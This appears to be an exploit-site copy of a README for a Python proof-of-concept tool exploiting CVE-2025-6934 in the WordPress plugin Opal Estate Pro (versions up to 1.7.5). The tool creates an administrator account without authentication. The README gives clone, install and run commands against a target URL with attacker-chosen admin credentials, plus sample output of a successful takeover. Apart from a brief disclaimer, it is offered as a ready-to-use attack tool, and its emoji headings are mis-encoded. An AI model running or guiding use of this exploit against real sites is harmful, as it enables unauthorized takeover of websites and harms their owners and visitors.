Share
## https://sploitus.com/exploit?id=BD5F05EF-9AFB-5A28-8B6A-4A182A3A10C4
# CVE-2025-6934 Auto Exploit



---
## โก Overview
**CVE-2025-6934** is a proof-of-concept (PoC) exploit targeting **WordPress Plugin: Opal Estate Pro โค 1.7.5**.
This exploit demonstrates **unauthenticated administrator account creation**.
> **Disclaimer:** This PoC is for educational purposes only. Do **not** use on systems without permission.
---
## ๐ Features
- Detect plugin version automatically.
- Retrieve required nonce for registration.
- Create a new administrator account without authentication.
- Colorful console output with status, success, failure, and info messages.
- Works on Python 3.x with minimal dependencies.
---
## โ๏ธ Installation
1. Clone the repository:
```bash
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
````
2. Install dependencies:
```bash
pip install -r requirements.txt
```
> Requirements: `requests`, `beautifulsoup4`, `colorama`
---
## ๐ Usage
```bash
python3 main.py -u -mail -password -user
```
### Example:
```bash
python3 main.py -u http://site.com/ -mail admin@horsefucker.org -password 3xplo1tI5Fun -user r1337
```
### Arguments
| Flag | Description | Required | Default |
| -------------------------- | ---------------------- | -------- | --------------- |
| `-u, --url` | Target site URL | Yes | - |
| `-mail, --newmail` | Email for new admin | Yes | - |
| `-password, --newpassword` | Password for new admin | Yes | - |
| `-user, --username` | Username for new admin | No | `administrator` |
---
## ๐จ Output
The console shows:
* Status messages `[โข]`
* Success `[โ]`
* Fail `[โ]`
* Info `[i]`
Example:
```
[โข] Starting Exploit...
[โ] Nonce Found: xyz123
[โ] Exploit Successful!
Username : r1337
Email : admin@horsefucker.org
Password : 3xplo1tI5Fun
Role : administrator
```
---
## ๐ Security & Disclaimer
* For **educational & testing purposes only**.
* Do **not** attack websites without explicit permission.
* Use in a controlled lab or authorized penetration test only
---
## ๐ Connect with Me
I'm an active developer who enjoys building tools and sharing knowledge. You can reach me through: